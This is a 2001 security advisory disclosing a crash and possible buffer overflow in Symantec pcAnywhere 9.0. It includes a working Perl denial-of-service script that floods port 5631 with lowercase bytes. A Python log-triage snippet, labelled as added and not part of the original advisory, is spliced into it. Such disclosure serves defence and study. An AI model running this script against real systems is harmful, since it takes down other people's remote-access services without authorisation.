Symantec pcAnywhere 9.0 DoS / Buffer Overflow




=============================================================================
Securax-SA-14                                               Security Advisory
belgian.networking.security                                             Dutch
=============================================================================
Topic:          Symantec pcAnywhere 9.0 DoS / Buffer Overflow
Announced:      2001-02-08
Affects:        Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE
=============================================================================



  Note: This entire advisory has been based upon trial and error results. We
        cannot ensure the information below is 100% correct, since we do
        not have any source code to audit. This document is subject to change
        without prior notice.

        If you happen to find more information / problems concerning the below
        problem or further variants, please contact me at the following email,
        incubus@securax.net, or you can contact info@securax.org.


  I.  Problem Description
  -----------------------

  Symantec PcAnywhere is a program that will allow others (who are authorised
  to have access :)) to use your pc. It's similar to a Windows NT 4.0 terminal
  server.

  PcAnywhere (when it's configured to 'be a host pc') listens on 2 ports, 5631
  (pcanywheredata, according to nmap) and 65301 (pcanywhere). When a user
  sends certain data in a particular way, pcAnywhere will crash.

  When a large amount of data is sent to a 'waiting' host on the
  pcanywheredata port (the amount varies: sometimes the host will go down with
  320k characters, sometimes you will have to send 500k bytes), "AWHOST32.EXE"
  will crash, give an error on the screen, and write the "Unexpected program
  error" to a logfile. (The entry includes EAX, EBX, ..., so read them; you'll
  find the yummy 0x61616161.)

  Oh yeah, don't use uppercase characters, as PcAnywhere won't crash on them.
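
  The register check mentioned above, as an added triage example that is not
  part of the original advisory: 0x61616161 is the ASCII text "aaaa", the same
  \x61 filler the sender transmits, so a register holding it shows that network
  input overwrote process state. The dump syntax, SAMPLE_LOG and the function
  names are assumptions; the advisory does not show the real logfile layout.

```python
import re

# Assumed dump syntax (NAME=hex or NAME: 0xhex); the advisory does not show
# the real logfile layout, so adjust the pattern to the actual file.
REG_RE = re.compile(
    r"\b(E[A-D]X|E[SD]I|E[SB]P|EIP)\s*[=:]\s*(?:0x)?([0-9A-F]{8})\b", re.I)

# Constructed sample, not real AWHOST32.EXE output.
SAMPLE_LOG = """\
Unexpected program error
EAX=61616161 EBX=0063F2A4 ECX=00000000 EDX=61616161
ESI=0063F9C0 EDI=61616161 EBP=0063F2D0 ESP=0063F1F8
EIP=00412F3A
"""

def classify(hexval):
    """Return 'repeated-byte', 'printable-ascii' or None for 8 hex digits."""
    raw = bytes.fromhex(hexval)
    if not all(0x20 <= b <= 0x7E for b in raw):
        return None  # ordinary pointer or integer, not text
    return "repeated-byte" if len(set(raw)) == 1 else "printable-ascii"

def triage(log_text):
    """Map register name -> (hex, text, verdict) for text-like registers."""
    findings = {}
    for name, hexval in REG_RE.findall(log_text):
        verdict = classify(hexval)
        if verdict:
            # Text is shown in register digit order; x86 memory order is reversed.
            text = bytes.fromhex(hexval).decode("ascii")
            findings[name.upper()] = (hexval.lower(), text, verdict)
    return findings

def input_reached_control_flow(findings):
    """True when the instruction pointer itself holds text-like data."""
    return "EIP" in findings

if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for reg, (hexval, text, verdict) in sorted(result.items()):
        print(f"{reg}=0x{hexval} {text!r} {verdict}")
    print("EIP overwritten:", input_reached_control_flow(result))
```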

  Why no exploit, just a lame Denial of Service?

    1.) because I suck at win32 debugging / overflowing (but I'm reading)
        /* so if I can overflow win32 progs, I'll code an exploit */
    2.) as the amount of data is variable, it's hard to overflow..

  The DoS code:

  <--bof-->

   #!/usr/bin/perl

   # Symantec PcAnywhere 9.0 Denial of Service
   # -----------------------------------------
   #          by incubus <incubus@securax.net>
   #                       http://www.hexyn.be
   #
   #                    http://www.securax.net
   # All my love to Tessa.
   # Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
   #            Zym0tic, segfault, #securax@irc.hexyn.be
   # Thanks to jurgen swennen, for letting me (ab)use his computer.
   #
   # this is intended as proof of concept, do not abuse!

   use IO::Socket;
   $host = "$ARGV[0]";
   $port = 5631;
   if ($#ARGV<0) {
   print "use it like: $0 <hostname>\n";
   exit();
   }
   $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
                                   PeerPort=>$port) || die "damn, ";
   print "hello\n";
   $buf = "";
   for($counter = 0; $counter < 500000; $counter++) {
           $buf .= "\x61";
   }
   print $socket "$buf\n";
   close($socket);
   exit();

  <--eof-->


  II. Impact
  ----------

  If someone exploits this, then Symantec is forced to rename this
  product to PcAnyoneAnywhere or something...

  No, seriously, this could lead to a compromise of a system.


  III. Possible workarounds
  -------------------------

  This advisory was also  sent to Symantec (info@symantec.com), we'll see what
  they do with it...

  IV. Credits
  -----------
  love to Tessa.
  greetz go out to : f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron, segfau|t,
                     and so many, many  others I forgot...


=============================================================================
For more information                                      incubus@securax.org
Website                                                http://www.securax.org
Advisories/Text                                   http://www.securax.org/pers
-----------------------------------------------------------------------------


